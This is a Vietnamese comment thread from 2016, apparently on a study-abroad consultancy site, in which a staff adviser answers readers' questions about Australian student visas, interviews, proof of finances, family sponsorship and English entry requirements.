  hoaipt@megastudy.edu.vn: Chào em, về trường hợp của em tỷ lệ đậu được visa sẽ không cao vì có người thân đang nhập cư bất hợp pháp. Em nên lựa chọn một nước nào khác đi du học và có cơ hội mình sang Úc sau sẽ là điều tốt nhất em nhé!
  Vào lúc: 21/07/2016, 08:54:19
 • Phương Bùi: Cho em hỏi là em đã nộp hồ sơ xin đi du học Úc vào 1/7/2016 rồi mà đến nay 20 ngày vân chưa có kết quả . Em vẫn chưa được phỏng vấn visa ạ . Em năm nay 16 tuổi và sẽ học THPT bên Úc ạ
  Vào lúc: 20/07/2016, 13:29:53 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, phía lãnh sự quán sẽ xem xét hồ sơ của em nếu cần thiết người xét duyệt hồ sơ sẽ gọi điện phỏng vấn nếu không thì người ta không gọi em nhé.
  Vào lúc: 21/07/2016, 08:52:16
 • nguyễn xuân Phú: trong quá trình đợi xét duyệt bên sứ quán có gọi cho bạn em nhưng bạn e chẳng may không nghe máy có sao không ạ, và bên sứ quán có gọi lại không ạ
  Vào lúc: 18/07/2016, 17:41:06 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, Phía lãnh sự quán sẽ gọi lại cho bạn em để phỏng vấn. Trong trường hợp nếu lâu quá sắp đến ngày nhập học mà chưa thấy gọi lại bạn em có thể gọi lại số của lãnh sự quán để hỏi thông tin. Chúc bạn em thành công!
  Vào lúc: 21/07/2016, 08:51:18
 • Vothithanhbinh: Do điều kiện nên em chỉ có thể học Diploma. Sau đó em sẽ học lên đại học. Phải mất thời gian bao lâu là em có thể hoàn thành xong 2 bằng đó ạ? Em học nghành về nhà hàng khách sạn ạ. Em cảm ơn!
  Vào lúc: 04/07/2016, 14:53:10 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, thông thường học khóa cao đẳng em sẽ mất khoảng 2 năm học và chuyển tiếp lên đại học thì em mất khoảng 1,5 năm đến 2 năm tùy theo từng trường em nhé.
  Vào lúc: 06/07/2016, 10:25:18
 • hà hảo: e có e gái đang học lớp 7 gia đìn muốn cho nó qua học thì phải làm như thế nào ' để chứng minh đủ điều kiện cho nó theo học tại các trường ở úc
  Vào lúc: 24/06/2016, 21:22:07 - Trả lời

  hoaipt@megastudy.edu.vn: trường hợp của em gái em phải làm hồ sơ theo diện chứng minh tài chính. Việc chứng minh tài chính em có thể hiểu chung chung như sau: chứng minh phát sinh thu nhập của những người cùng đứng ra bảo lãnh cho em gái em đi du học thông qua sự xác nhận của cơ quan có thẩm quyền. Tư vấn sẽ liên hệ với em để tư vấn thông tin chi tiết hơn hoặc em có thể trực tiếp liên hệ tới số điện thoại tổng đài của công ty 0473.060.696 để nhận sự trợ giúp!
  Vào lúc: 25/06/2016, 09:01:53
 • Ni Lam: Nếu em đã được định cư và  em muốn bảo lãnh cha mẹ và hai em  ở Việt Nam qua định cư có được không? và em cần làm gì?
  Vào lúc: 20/06/2016, 15:05:41 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, em hoàn toàn có thể bảo lãnh cha mẹ và người thân ở Việt Nam sang. tuy nhiên em cần chứng minh hoặc thể hiện tình trạng visa của mình tại Úc và chứng minh thu nhập của mình em nhé. Ngoài ra khi vào trường hợp cụ thể có những tình huống chi tiết cụ thể em nhé.
  Vào lúc: 21/06/2016, 09:28:24
 • Nguyệt Vy: Em tốt nghiệp 12 năm 2012. ĐẬu trường DH Quốc Tế(DH Quốc Gia) ngành Quản Trị Kinh Doanh. Sau khi học hơn 1 năm thì có làm Visa đi Mỹ nhưng rớt phỏng vấn. Sau đó e nghỉ ngang để cưới chồng sinh con. Em mới thi lại ĐH và đậu trường ĐH Hoa Sen ngành Marketing. Bây giờ em muốn làm hồ sơ đi Úc thì có được không? Cần điều kiện avan như thế nào? Nếu đi thì e có thể học Làm Bánh được không? Hay phải học ngành liên quan tới Marketing?
  Vào lúc: 17/06/2016, 17:48:32 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, về trường hợp của em hoàn toàn có thể làm hồ sơ đi du học Úc được em nhé. Theo như yêu cầu đầu vào của các trường đại học tại Úc yêu cầu đầu vào của anh văn là IELTS 6.0 hoặc các chứng chỉ quốc tế khác tương đương.
  Vào lúc: 18/06/2016, 10:17:05